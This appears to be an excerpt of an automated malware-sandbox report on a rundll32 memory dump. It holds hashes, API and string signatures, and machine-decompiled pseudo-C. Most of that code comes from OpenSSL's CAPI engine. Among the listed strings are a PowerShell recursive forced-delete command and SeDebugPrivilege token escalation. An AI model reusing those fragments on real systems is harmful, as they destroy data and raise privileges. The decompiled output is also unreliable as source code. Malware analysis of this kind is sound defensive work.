                                        0x21ef2fea64f
                                        0x21ef2fea656
                                        0x21ef2fea660
                                        0x21ef2fea669
                                        0x21ef2fea66e
                                        0x21ef2fea676
                                        0x21ef2fea679
                                        0x21ef2fea67d
                                        0x21ef2fea681
                                        0x21ef2fea688
                                        0x21ef2fea693
                                        0x21ef2fea6a6
                                        0x21ef2fea6a9
                                        0x21ef2fea6b4
                                        0x21ef2fea6c5
                                        0x21ef2fea6c7
                                        0x21ef2fea6d4
                                        0x21ef2fea6e7
                                        0x21ef2fea6fc
                                        0x21ef2fea706
                                        0x21ef2fea710
                                        0x21ef2fea723
                                        0x21ef2fea726
                                        0x21ef2fea72a
                                        0x21ef2fea731
                                        0x21ef2fea742
                                        0x21ef2fea744
                                        0x21ef2fea751
                                        0x21ef2fea764
                                        0x21ef2fea76a
                                        0x21ef2fea777
                                        0x21ef2fea77c
                                        0x21ef2fea784
                                        0x21ef2fea789
                                        0x21ef2fea78f
                                        0x21ef2fea796
                                        0x21ef2fea79c
                                        0x21ef2fea7a3
                                        0x21ef2fea7ad
                                        0x21ef2fea7b6
                                        0x21ef2fea7bb
                                        0x21ef2fea7c3
                                        0x21ef2fea7c7
                                        0x21ef2fea7cc
                                        0x21ef2fea7d4
                                        0x21ef2fea7da
                                        0x21ef2fea7e4
                                        0x21ef2fea7ed
                                        0x21ef2fea7f3
                                        0x21ef2fea7fa
                                        0x21ef2fea800
                                        0x21ef2fea807
                                        0x21ef2fea811
                                        0x21ef2fea817
                                        0x21ef2fea821
                                        0x21ef2fea834
                                        0x21ef2fea837
                                        0x21ef2fea842
                                        0x21ef2fea848
                                        0x21ef2fea84d
                                        0x21ef2fea852
                                        0x21ef2fea853
                                        0x21ef2fea858
                                        0x21ef2fea859
                                        0x21ef2fea85e
                                        0x21ef2fea85f
                                        0x21ef2fea865
                                        0x21ef2fea86a
                                        0x21ef2fea86b
                                        0x21ef2fea870
                                        0x21ef2fea871
                                        0x21ef2fea876
                                        0x21ef2fea877
                                        0x21ef2fea87d
                                        0x21ef2fea882
                                        0x21ef2fea883
                                        0x21ef2fea888
                                        0x21ef2fea889
                                        0x21ef2fea88e
                                        0x21ef2fea88f
                                        0x21ef2fea895
                                        0x21ef2fea89a
                                        0x21ef2fea89b
                                        0x21ef2fea8a0
                                        0x21ef2fea8a1
                                        0x21ef2fea8a6
                                        0x21ef2fea8a7
                                        0x21ef2fea8ad
                                        0x21ef2fea8b2
                                        0x21ef2fea8b3
                                        0x21ef2fea8b8
                                        0x21ef2fea8b9
                                        0x21ef2fea8be
                                        0x21ef2fea8bf
                                        0x21ef2fea8c5
                                        0x21ef2fea8ca
                                        0x21ef2fea8cb
                                        0x21ef2fea8d0
                                        0x21ef2fea8d1
                                        0x21ef2fea8d6
                                        0x21ef2fea8d7
                                        0x21ef2fea8dd
                                        0x21ef2fea8e0
                                        0x21ef2fea8e8
                                        0x21ef2fea8f2
                                        0x21ef2fea8f6
                                        0x21ef2fea904
                                        0x21ef2fea910
                                        0x21ef2fea931
                                        0x21ef2fea94d
                                        0x21ef2fea951
                                        0x21ef2fea96a
                                        0x21ef2fea96f
                                        0x21ef2fea973
                                        0x21ef2fea977
                                        0x21ef2fea97f
                                        0x21ef2fea983
                                        0x21ef2fea98b
                                        0x21ef2fea999
                                        0x21ef2fea99f
                                        0x21ef2fea9a4
                                        0x21ef2fea9a9
                                        0x21ef2fea9b2
                                        0x21ef2fea9b7
                                        0x21ef2fea9bc
                                        0x21ef2fea9ce
                                        0x21ef2fea9d4
                                        0x21ef2fea9e3
                                        0x21ef2fea9f0
                                        0x21ef2fea9fa
                                        0x21ef2feaa1c
                                        0x21ef2feaa21
                                        0x21ef2feaa33
                                        0x21ef2feaa3c
                                        0x21ef2feaa48
                                        0x21ef2feaa4d
                                        0x21ef2feaa5f
                                        0x21ef2feaa73
                                        0x21ef2feaa83
                                        0x21ef2feaa89
                                        0x21ef2feaa8e
                                        0x21ef2feaa96

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentSleep$ExitUninitialize
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$powershell
                                        • API String ID: 2163826473-3626569723
                                        • Opcode ID: d1f916ce357f91987c03dcee5e6566ac6c65c43ba8a4d98377edd93f11aada1b
                                        • Instruction ID: 4f9fa1c1054dee87e9def47662991e537c10bbce1e97d8400551ce81a5a5f615
                                        • Opcode Fuzzy Hash: d1f916ce357f91987c03dcee5e6566ac6c65c43ba8a4d98377edd93f11aada1b
                                        • Instruction Fuzzy Hash: D102BC32221A9685FF15BBB4CC4D3EE23B1E761354F5209129E5A16EDBEF38C586C384
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                        			E0000021E21EF3030030(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long _a8, long _a16, char _a20, char _a24, signed long long _a40, long long _a48, long long _a112) {
                                        				long _v0;
                                        				void* __rbp;
                                        				void* _t28;
                                        				long _t32;
                                        				long _t40;
                                        				void* _t64;
                                        				signed long long _t79;
                                        				long _t81;
                                        				long _t82;
                                        				char* _t107;
                                        				void* _t113;
                                        				long _t128;
                                        
                                        				_t120 = __r9;
                                        				_t116 = __r8;
                                        				E0000021E21EF310C220();
                                        				_t79 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_a40 = _t79 ^ _t113 - __rax;
                                        				_t112 = __rcx;
                                        				E0000021E21EF302D790(_t79 ^ _t113 - __rax, "capi_list_providers\n", __r8, __r9);
                                        				E0000021E21EF30263F0(_t79 ^ _t113 - __rax, "Available CSPs:\n", _t116, _t120);
                                        				r15d = 0;
                                        				_a112 = __rbx;
                                        				_t64 = r15d;
                                        				_a48 = __rsi;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = _t64;
                                        				_t28 = E0000021E21EF302D790(_t79 ^ _t113 - __rax, "capi_get_provname, index=%d\n", _t116, _t120);
                                        				_t81 =  &_a20;
                                        				r8d = 0;
                                        				_a8 = _t81;
                                        				_v0 = _t128;
                                        				__imp__CryptEnumProvidersW();
                                        				if (_t28 == 0) goto 0xf3030229;
                                        				r8d = 0x46c;
                                        				E0000021E21EF3025700();
                                        				_t84 = _t81;
                                        				if (_t81 == 0) goto 0xf30301f3;
                                        				_t82 =  &_a20;
                                        				r8d = 0;
                                        				_a8 = _t82;
                                        				_v0 = _t81;
                                        				__imp__CryptEnumProvidersW();
                                        				if (_t28 == 0) goto 0xf303018b;
                                        				E0000021E21EF3030FB0(_t82, _t81);
                                        				r8d = 0x47c;
                                        				_t110 = _t82;
                                        				E0000021E21EF3025750();
                                        				if (_t82 == 0) goto 0xf303029a;
                                        				r9d = _a16;
                                        				E0000021E21EF302D790(_t82, "capi_get_provname, returned name=%s, type=%d\n", _t82,  &_a16);
                                        				_v0 = _a16;
                                        				r8d = _t64;
                                        				E0000021E21EF30263F0(_t82, "%lu. %s, type %lu\n", _t82, _t82);
                                        				r8d = 0x496;
                                        				E0000021E21EF3025750();
                                        				goto 0xf3030090;
                                        				_t32 = GetLastError();
                                        				r8d = 0x473;
                                        				_t107 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				E0000021E21EF3025750();
                                        				if (_t32 == 0x103) goto 0xf303029a;
                                        				if ( *0xf3209020 != 0) goto 0xf30301c9;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t82);
                                        				_v0 = 0x476;
                                        				r8d = 0x68;
                                        				E0000021E21EF30222D0(_t34, 0x68,  *0xf3209020, _t82, _t81, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302D9B0(_t32,  *0xf3209020, _t82, _t107);
                                        				goto 0xf303029a;
                                        				if ( *0xf3209020 != 0) goto 0xf3030208;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t82);
                                        				_v0 = 0x46e;
                                        				_t18 = _t107 - 0x27; // 0x41
                                        				r8d = _t18;
                                        				E0000021E21EF30222D0(_t38, 0x68,  *0xf3209020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf303029a;
                                        				_t40 = GetLastError();
                                        				if (_t40 == 0x103) goto 0xf303029a;
                                        				if ( *0xf3209020 != 0) goto 0xf303024d;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t82);
                                        				_v0 = 0x468;
                                        				r8d = 0x68;
                                        				E0000021E21EF30222D0(_t42, 0x68,  *0xf3209020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				r9d = _t40;
                                        				E0000021E21EF3026420(_t82,  &_a24, _t107, "%lX", "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF3021640(2, _t82, "Error code= 0x",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}
















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptEnumErrorLastProviders
                                        • String ID: %lX$%lu. %s, type %lu$..\..\openssl-1.1.0f\engines\e_capi.c$Available CSPs:$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d$capi_list_providers
                                        • API String ID: 747760079-1615478548
                                        • Opcode ID: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction ID: c05dcf619205048a1c938ba7bfd7b1a67ee943eef9d8042b63d137661064f77a
                                        • Opcode Fuzzy Hash: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction Fuzzy Hash: D061AD75304A4086FF609B65EC587DBA3A1F7A9B84F828026AD4A47FA5EF3CC507C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease$CountCounterCurrentGlobalMemoryPerformanceProcessQueryStatusTick
                                        • String ID: @$Intel Hardware Cryptographic Service Provider
                                        • API String ID: 246993173-3158535399
                                        • Opcode ID: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction ID: 63296ce7fa3d3733788fbd55216012567c4753ef898a668482b764ff3fe66ac3
                                        • Opcode Fuzzy Hash: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction Fuzzy Hash: 76414D71614A4082FF619F21EC5C7D762B1FBA4B40F42C122EE4A46EA9DF3DC946CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseHandleProc$CurrentLibraryLoadLookupPrivilegeProcessValue
                                        • String ID: AdjustTokenPrivileges$Advapi32.dll$OpenProcessToken$SeDebugPrivilege
                                        • API String ID: 1752774111-261832459
                                        • Opcode ID: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction ID: b13d777e5ef00787db3dd24666cca96613e8ad9c411535ccca2dae7b9caa0dd9
                                        • Opcode Fuzzy Hash: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction Fuzzy Hash: C821FC76614B4182DF409B55F84829AB3F0F7A9B94F458026EE8A87B28EE7CC559CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0000021E21EF302F050(void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, void* __r8, char _a8, long long _a16, long long _a24, char _a32, signed long long _a48, long long _a56, long long _a64, long long _a136) {
                                        				long long _v0;
                                        				long long _v8;
                                        				void* __rdi;
                                        				void* _t112;
                                        				void* _t113;
                                        				intOrPtr _t136;
                                        				unsigned int _t141;
                                        				signed long long _t176;
                                        				char* _t178;
                                        				long long _t179;
                                        				long long _t181;
                                        				char* _t182;
                                        				intOrPtr _t185;
                                        				long long _t216;
                                        				void* _t222;
                                        				void* _t223;
                                        				void* _t227;
                                        				long long _t229;
                                        				long long _t232;
                                        				void* _t233;
                                        				void* _t234;
                                        				void* _t235;
                                        				long long _t238;
                                        				long long _t239;
                                        				void* _t241;
                                        				char* _t256;
                                        				char* _t257;
                                        				void* _t262;
                                        				long long _t264;
                                        				void* _t266;
                                        
                                        				_t238 = __rbp;
                                        				_t232 = __rsi;
                                        				_t216 = __rdx;
                                        				_t181 = __rbx;
                                        				E0000021E21EF310C220();
                                        				_t176 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_a48 = _t176 ^ _t241 - __rax;
                                        				_t264 = __rdx;
                                        				_a32 = __rdx;
                                        				_t178 =  &_a8;
                                        				_t262 = __rcx;
                                        				_v0 = _t178;
                                        				r14d = 0;
                                        				r9d = 0;
                                        				_t185 =  *((intOrPtr*)(__rdx + 0x10));
                                        				r15d = 0;
                                        				_v8 = _t229;
                                        				_t7 = _t266 + 6; // 0x6
                                        				r8d = _t7;
                                        				__imp__CryptExportKey();
                                        				if (0x70 != 0) goto 0xf302f0ef;
                                        				if ( *0xf3209020 != 0) goto 0xf302f0c4;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t178);
                                        				_v8 = 0x27d;
                                        				_t256 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t9 = _t216 + 2; // 0x75
                                        				r8d = _t9;
                                        				E0000021E21EF30222D0(_t58, 0x73,  *0xf3209020, _t178, __rbx, _t185, _t216, __rsi, __rbp, _t256);
                                        				E0000021E21EF302DA10( *0xf3209020, _t178, _t216);
                                        				goto 0xf302f56a;
                                        				_t217 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_a136 = _t181;
                                        				r8d = 0x282;
                                        				_a64 = _t238;
                                        				_a56 = _t232;
                                        				E0000021E21EF3025700();
                                        				_t182 = _t178;
                                        				if (_t178 == 0) goto 0xf302f4f7;
                                        				_t179 =  &_a8;
                                        				r9d = 0;
                                        				_v0 = _t179;
                                        				_v8 = _t182;
                                        				_t18 = _t256 + 6; // 0x6
                                        				r8d = _t18;
                                        				__imp__CryptExportKey();
                                        				if (0 != 0) goto 0xf302f187;
                                        				if ( *0xf3209020 != 0) goto 0xf302f15e;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
                                        				_v8 = 0x288;
                                        				_t257 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t20 = _t217 + 1; // 0x74
                                        				r8d = _t20;
                                        				E0000021E21EF30222D0(_t63, 0x73,  *0xf3209020, _t179, _t182,  *((intOrPtr*)(_t264 + 0x10)), "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t232, _t238, _t257);
                                        				E0000021E21EF302DA10( *0xf3209020, _t179, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302f52b;
                                        				if ( *_t182 == 6) goto 0xf302f1b6;
                                        				if ( *0xf3209020 != 0) goto 0xf302f1a1;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
                                        				_v8 = 0x28f;
                                        				r8d = 0x73;
                                        				goto 0xf302f51d;
                                        				r9d =  *((intOrPtr*)(_t182 + 4));
                                        				if ((_t257 - 0x00002400 & 0xffff7fff) == 0) goto 0xf302f3da;
                                        				if (r9d != 0x2200) goto 0xf302f375;
                                        				r9d =  *((intOrPtr*)(_t182 + 8));
                                        				if (r9d == 0x31535344) goto 0xf302f224;
                                        				E0000021E21EF3026420(_t179,  &_a32, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", "%lx", _t257);
                                        				if ( *0xf3209020 != 0) goto 0xf302f211;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
                                        				_v8 = 0x2ca;
                                        				r8d = 0x7a;
                                        				goto 0xf302f420;
                                        				_t30 = _t182 + 0x10; // 0x10
                                        				_t233 = _t30;
                                        				_t141 =  *(_t182 + 0xc) >> 3;
                                        				E0000021E21EF3040380( *0xf3209020, _t179, _t182, _t262, _t233, _t238);
                                        				if (_t179 == 0) goto 0xf302f4f7;
                                        				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
                                        				_a24 = _t179;
                                        				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
                                        				_t263 = _t179;
                                        				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
                                        				_t265 = _t179;
                                        				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
                                        				_a16 = _t179;
                                        				if (_a24 == 0) goto 0xf302f356;
                                        				if (_t179 == 0) goto 0xf302f356;
                                        				if (_t179 == 0) goto 0xf302f356;
                                        				if (_t179 == 0) goto 0xf302f356;
                                        				E0000021E21EF3040600(_t179, _t182, _t179, _a24, _t233, _t238, _t179, _t179);
                                        				r8d = 0;
                                        				E0000021E21EF3040580(_t179, _t182, _t179, _a16, _t233, _t179);
                                        				r8d = _t141;
                                        				if (E0000021E21EF3030F40(_t113, 0xa, _t179, _a24, _t233) == 0) goto 0xf302f4f7;
                                        				r8d = 0x14;
                                        				_t234 = _t233 + _t179;
                                        				if (E0000021E21EF3030F40(_t113, 0xa, _t179, _t179, _t234) == 0) goto 0xf302f4f7;
                                        				_t235 = _t234 + 0x14;
                                        				r8d = _t141;
                                        				_t222 = _t235;
                                        				if (E0000021E21EF3030F40(_t113, 0xa, _t179, _t179, _t222) == 0) goto 0xf302f4f7;
                                        				r8d = _t141;
                                        				_t223 = _t222 + _t235;
                                        				if (E0000021E21EF3030F40(_t113, _t141, _t179, _a16, _t223) == 0) goto 0xf302f4f7;
                                        				0xf30406a0();
                                        				E0000021E21EF30472C0(E0000021E21EF3030F40(_t113, _t141, _t179, _a16, _t223), _t179, _t235, _t238);
                                        				if (_t179 == 0) goto 0xf302f4f7;
                                        				0xf3046de0();
                                        				r15d = 0;
                                        				goto 0xf302f52b;
                                        				E0000021E21EF3043B20(_t179, _t179);
                                        				E0000021E21EF3043B20(_t179, _t263);
                                        				E0000021E21EF3043B20(_t179, _t179);
                                        				goto 0xf302f4f2;
                                        				E0000021E21EF3026420(_t179,  &_a32, _t223, "%ux", _t265);
                                        				if ( *0xf3209020 != 0) goto 0xf302f3a0;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
                                        				_v8 = 0x2f9;
                                        				_t41 = _t223 + 6; // 0x79
                                        				r8d = _t41;
                                        				E0000021E21EF30222D0(_t90, 0x73,  *0xf3209020, _t179, _t182,  &_a32, _t223, _t235, _t238, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF3021640(2, _t179, "aiKeyAlg=0x",  &_a32, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302f52b;
                                        				r9d =  *((intOrPtr*)(_t182 + 8));
                                        				if (r9d == 0x31415352) goto 0xf302f44e;
                                        				E0000021E21EF3026420(_t179,  &_a32, "aiKeyAlg=0x", "%lx", "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				if ( *0xf3209020 != 0) goto 0xf302f412;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
                                        				_v8 = 0x29c;
                                        				r8d = 0x7b;
                                        				E0000021E21EF30222D0(_t95, 0x73,  *0xf3209020, _t179, _t182,  &_a32, "aiKeyAlg=0x", _t235, _t238, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF3021640(2, _t179, "magic=0x",  &_a32, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302f52b;
                                        				E0000021E21EF303F960( *0xf3209020, _t179, _t182, _t263, _t235, _t238);
                                        				if (_t179 == 0) goto 0xf302f4f7;
                                        				E0000021E21EF3043D30(_t179, _t179, _t235, _t238);
                                        				_t239 = _t179;
                                        				E0000021E21EF3043D30(_t179, _t179, _t235, _t239);
                                        				_t236 = _t179;
                                        				if (_t239 == 0) goto 0xf302f4e7;
                                        				if (_t179 == 0) goto 0xf302f4e7;
                                        				r9d = 0;
                                        				E0000021E21EF303FB40(_t179, _t182, _t179, _t179, _t179, _t239, _t239, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				if (E0000021E21EF3044090(_t179, _t182, _t239, _t179) == 0) goto 0xf302f4f7;
                                        				r8d =  *(_t182 + 0xc);
                                        				_t49 = _t182 + 0x14; // 0x14
                                        				_t227 = _t49;
                                        				r8d = r8d >> 3;
                                        				if (E0000021E21EF3030F40(_t113,  *((intOrPtr*)(_t182 + 0x10)), _t179, _t179, _t227) == 0) goto 0xf302f4f7;
                                        				_t136 =  *0xf31e78d8; // 0xffffffff
                                        				E0000021E21EF303FBE0(_t136, _t179, _t179, _t179, _t179, _t239);
                                        				E0000021E21EF30472C0(E0000021E21EF3030F40(_t113,  *((intOrPtr*)(_t182 + 0x10)), _t179, _t179, _t227), _t179, _t179, _t239);
                                        				if (_t179 == 0) goto 0xf302f4f7;
                                        				0xf3046de0();
                                        				r14d = 0;
                                        				goto 0xf302f52b;
                                        				E0000021E21EF3043B20(_t179, _t239);
                                        				E0000021E21EF3043B20(_t179, _t236);
                                        				if ( *0xf3209020 != 0) goto 0xf302f50c;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
                                        				_v8 = 0x30a;
                                        				_t51 = _t227 - 0x32; // 0x41
                                        				r8d = _t51;
                                        				E0000021E21EF30222D0(_t109, 0x73,  *0xf3209020, _t179, _t182, _t236, _t227, _t236, _t239, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				r8d = 0x2ff;
                                        				E0000021E21EF3025750();
                                        				if (_t179 != 0) goto 0xf302f567;
                                        				E0000021E21EF303F7E0(0x73, _t179, _t179, _t179, _a56, _a64);
                                        				_t112 = E0000021E21EF3040240(0x73, _t179, _t179, _t179, _a56, _a64);
                                        				E0000021E21EF310C290();
                                        				return _t112;
                                        			}


































                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptExport
                                        • String ID: %lx$%ux$..\..\openssl-1.1.0f\engines\e_capi.c$DSS1$RSA1$aiKeyAlg=0x$magic=0x
                                        • API String ID: 3389274496-2803325008
                                        • Opcode ID: 1927bf09b0e8788728698409766e1937571a13029584711ed29007a180a88e5c
                                        • Instruction ID: 0c45f5e17bb98fb5c3aab62d0d7e4219f0e8385a8b8e83a0af86d01ce00a7415
                                        • Opcode Fuzzy Hash: 1927bf09b0e8788728698409766e1937571a13029584711ed29007a180a88e5c
                                        • Instruction Fuzzy Hash: 22D16E7130464186FE60EB62EC19BDB62A1BBA5BC4F524016AE0987F96DF3CC907C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E0000021E21EF3030380(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long* _a112) {
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				void* _t9;
                                        				intOrPtr _t10;
                                        				void* _t15;
                                        				intOrPtr _t17;
                                        				long long _t24;
                                        				void* _t25;
                                        
                                        				_t15 = __rax;
                                        				_a32 = __r9;
                                        				_a24 = __r8;
                                        				_a16 = __rdx;
                                        				_a8 = __rcx;
                                        				E0000021E21EF310C220();
                                        				_t10 =  *0xf31e78c4; // 0xffffffff
                                        				E0000021E21EF30311E0(__rax, __rcx);
                                        				 *((long long*)(__r9)) = _t24;
                                        				 *_a112 = _t24;
                                        				_t17 =  *((intOrPtr*)(_t15 + 0x30));
                                        				_t23 =  !=  ? _t17 : "MY";
                                        				_t9 = E0000021E21EF3030650(_t10, _t17, __r9, _t15,  !=  ? _t17 : "MY", _t24, _t25, __r9);
                                        				if (_t17 != 0) goto 0xf3030400;
                                        				return _t9;
                                        			}













                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertStore$CertificatesEnum$CloseOpen
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Can't Parse Certificate %d
                                        • API String ID: 3767857896-627055899
                                        • Opcode ID: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction ID: 8e917f3a1335588b20da4e0eaa9ce2f2d1f4a4e61dcef21b164db69713ecbfe9
                                        • Opcode Fuzzy Hash: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction Fuzzy Hash: 0671717230274086EE64AB16EC587EBA3A1BBA5FC0F4684229D4A47F56EE3CC517C344
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 42%
                                        			E0000021E21EF302E300(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a32, void* _a88) {
                                        				signed long long _v32;
                                        				char _v52;
                                        				signed char _v53;
                                        				signed char _v54;
                                        				signed char _v55;
                                        				signed char _v56;
                                        				signed char _v57;
                                        				signed char _v58;
                                        				signed char _v59;
                                        				signed char _v60;
                                        				signed char _v61;
                                        				signed char _v62;
                                        				signed int _v63;
                                        				signed int _v64;
                                        				signed int _v65;
                                        				signed int _v66;
                                        				signed int _v67;
                                        				signed int _v68;
                                        				signed int _v69;
                                        				signed int _v70;
                                        				signed int _v71;
                                        				signed int _v72;
                                        				char _v80;
                                        				char _v88;
                                        				void* __rbp;
                                        				void* _t95;
                                        				void* _t117;
                                        				void* _t118;
                                        				void* _t147;
                                        				void* _t149;
                                        				signed long long _t167;
                                        				signed long long _t168;
                                        				long long _t171;
                                        				void* _t174;
                                        				char* _t195;
                                        				void* _t203;
                                        
                                        				_t199 = __rsi;
                                        				_t149 = __eflags;
                                        				_a16 = __rbx;
                                        				_a32 = __rsi;
                                        				_t202 = _t203;
                                        				E0000021E21EF310C220();
                                        				_t167 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t168 = _t167 ^ _t203 - __rax;
                                        				_v32 = _t168;
                                        				_t174 = __r8;
                                        				_t147 = __edx;
                                        				E0000021E21EF3040300(0x70, __r8);
                                        				E0000021E21EF30311E0(_t168, _t168);
                                        				_t195 = "Called CAPI_dsa_do_sign()\n";
                                        				E0000021E21EF302D790(_t168, _t195, __r8, __r9);
                                        				E0000021E21EF3040340(_t149, _t168, _t174, _t174, __rsi, _t203);
                                        				_t175 = _t168;
                                        				if (_t168 != 0) goto 0xf302e3ac;
                                        				if ( *0xf3209020 != 0) goto 0xf302e386;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t168);
                                        				_a8 = 0x3e3;
                                        				_t5 = _t195 - 0xd; // 0x65
                                        				r8d = _t5;
                                        				E0000021E21EF30222D0(_t80, 0x72,  *0xf3209020, _t168, _t168, _t174, _t195, __rsi, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302e634;
                                        				if (_t147 == 0x14) goto 0xf302e3ec;
                                        				if ( *0xf3209020 != 0) goto 0xf302e3c6;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t168);
                                        				_a8 = 0x3e8;
                                        				_t7 = _t195 + 0xa; // 0x7c
                                        				r8d = _t7;
                                        				E0000021E21EF30222D0(_t84, 0x72,  *0xf3209020, _t168, _t168, _t174, _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302e634;
                                        				_t169 =  &_v80;
                                        				r9d = 0;
                                        				_a8 =  &_v80;
                                        				r8d = 0;
                                        				__imp__CryptCreateHash();
                                        				if (0 != 0) goto 0xf302e44e;
                                        				if ( *0xf3209020 != 0) goto 0xf302e423;
                                        				 *0xf3209020 = E0000021E21EF3021CE0( &_v80);
                                        				_a8 = 0x3ee;
                                        				_t12 = _t195 - 0xf; // 0x63
                                        				r8d = _t12;
